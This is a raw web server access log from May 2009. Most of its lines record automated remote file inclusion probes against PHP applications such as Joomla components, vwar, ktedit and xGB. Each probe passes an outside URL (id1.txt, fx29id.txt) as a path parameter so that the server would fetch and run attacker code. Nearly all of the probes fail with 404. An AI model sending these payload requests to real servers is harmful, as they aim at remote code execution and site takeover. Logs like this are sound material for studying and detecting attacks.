85.10.128.219 - - [30/May/2009:00:11:01 -0400] "GET /logs/access_log.Q109051500%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:00:11:01 -0400] "GET /logs/access_log.Q109051600%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:11:13 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:11:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.16.193.132 - - [30/May/2009:00:11:36 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:11:58 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:11:59 -0400] "GET /logs/access_log.Q109050700//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:12:10 -0400] "GET /logs/access_log.Q109052200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.16.193.132 - - [30/May/2009:00:12:20 -0400] "GET /logs/access_log.Q109050300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://tycsport.twbbs.org///blps/dyna/data/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.122.72.93 - - [30/May/2009:00:13:22 -0400] "GET /logs/error_log.Q109051000//index.php?option=com_joomlaboard&Itemid=33&func=showcat&catid=&mosConfig_absolute_path=http://www.nulledfreakz.com//xvideos/images/bistro/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.6.8.108 - - [30/May/2009:00:13:58 -0400] "GET /logs/error_log.Q108103100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.241.40.51 - - [30/May/2009:00:15:51 -0400] "GET /logs/config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:15:51 -0400] "GET /config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:15:51 -0400] "GET /logs/access_log.Q109052100/config.php?path_to_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:15:54 -0400] "GET /logs/access_log.Q109052200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.241.40.51 - - [30/May/2009:00:15:55 -0400] "GET /logs/access_log.Q109050300/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.usher.co.kr//fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:16:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:00:17:38 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:38 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:38 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:38 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:40 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:40 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:40 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:40 -0400] "GET /logs/access_log.Q108021800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:42 -0400] "GET /logs/access_log.Q108021800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:42 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:42 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:42 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:42 -0400] "GET /logs/access_log.Q108021800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:43 -0400] "GET /logs/access_log.Q108021800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:44 -0400] "GET /logs/access_log.Q108021800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:44 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:44 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:45 -0400] "GET /logs/access_log.Q108021800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:17:59 -0400] "GET /logs/access_log.Q108072800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:18:00 -0400] "GET /logs/access_log.Q108072800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:18:03 -0400] "GET /logs/access_log.Q108072800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:18:04 -0400] "GET /logs/access_log.Q108072800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:18:05 -0400] "GET /logs/access_log.Q108072800%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:18:06 -0400] "GET /logs/access_log.Q108072800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:18 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:20 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:22 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:30 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:30 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:30 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:41 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:19:57 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:04 -0400] "GET /xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:06 -0400] "GET /logs/xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:11 -0400] "GET /logs/xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:12 -0400] "GET /xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:16 -0400] "GET /xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:21:16 -0400] "GET /logs/xGB.php?act=admin&do=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:21:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [30/May/2009:00:22:43 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:22:47 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:22:52 -0400] "GET /logs/access_log.Q109052200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:22:59 -0400] "GET /logs/access_log.Q109050300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:23:38 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:23:38 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:23:40 -0400] "GET /logs/access_log.Q109052200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:23:44 -0400] "GET /logs/access_log.Q109050300//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:25 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:25 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:25 -0400] "GET /logs/access_log.Q109052200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:27 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:27 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:27 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:33 -0400] "GET /logs/access_log.Q109052100%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:24:34 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:00:24:42 -0400] "GET /images/_notes/store_anim_r2_c1.gif.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.150 - - [30/May/2009:00:25:16 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.811"
85.214.83.196 - - [30/May/2009:00:25:39 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:25:39 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:25:39 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:25:43 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:25:45 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:25:46 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:25:47 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:25:49 -0400] "GET /logs/access_log.Q108052700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:25:49 -0400] "GET /logs/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:25:49 -0400] "GET /index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.68.76 - - [30/May/2009:00:25:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081BF4017610700609D041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.208.111.178 - - [30/May/2009:00:25:54 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:00:26:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B18215700E14D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.98.80.2 - - [30/May/2009:00:26:01 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:26:01 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:26:01 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.67.16 - - [30/May/2009:00:26:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20815D4B17F11700E74D04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.16 - - [30/May/2009:00:26:20 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C94318317700406D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.98.80.2 - - [30/May/2009:00:26:24 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:26:24 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:26:24 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:26:25 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:26:25 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:26:25 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:00:26:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.83.196 - - [30/May/2009:00:26:34 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:26:36 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:26:45 -0400] "GET /logs/access_log.Q108052700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.208.111.178 - - [30/May/2009:00:26:45 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:27:00 -0400] "GET /logs/error_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:27:11 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:27:11 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:27:11 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:27:18 -0400] "GET /logs/error_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:27:27 -0400] "GET /logs/access_log.Q109052200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.83.196 - - [30/May/2009:00:27:28 -0400] "GET /logs/access_log.Q109052100%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /logs/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /logs/access_log.Q108052700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /logs/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /logs/access_log.Q108052700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:28 -0400] "GET /index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:33 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:27:33 -0400] "GET /logs/access_log.Q109050700%20%20/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:27:52 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:28:03 -0400] "GET /logs/access_log.Q108052700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:28:03 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:28:03 -0400] "GET /logs/access_log.Q108052700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.50.197.106 - - [30/May/2009:00:28:03 -0400] "GET /logs/access_log.Q109050700/index1.php?x=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:28:06 -0400] "GET /logs/access_log.Q109051700//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:28:23 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:28:23 -0400] "GET /logs/access_log.Q109052200/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:28:23 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [30/May/2009:00:28:32 -0400] "GET /logs/access_log.Q109052100/includes/ktedit/toolbar.php?dirDepth=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.221.10.116 - - [30/May/2009:00:28:33 -0400] "GET /logs/error_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.80.2 - - [30/May/2009:00:29:19 -0400] "GET /logs/error_log.Q109051700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.birk-d.de/bandbill/data/fx29id.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
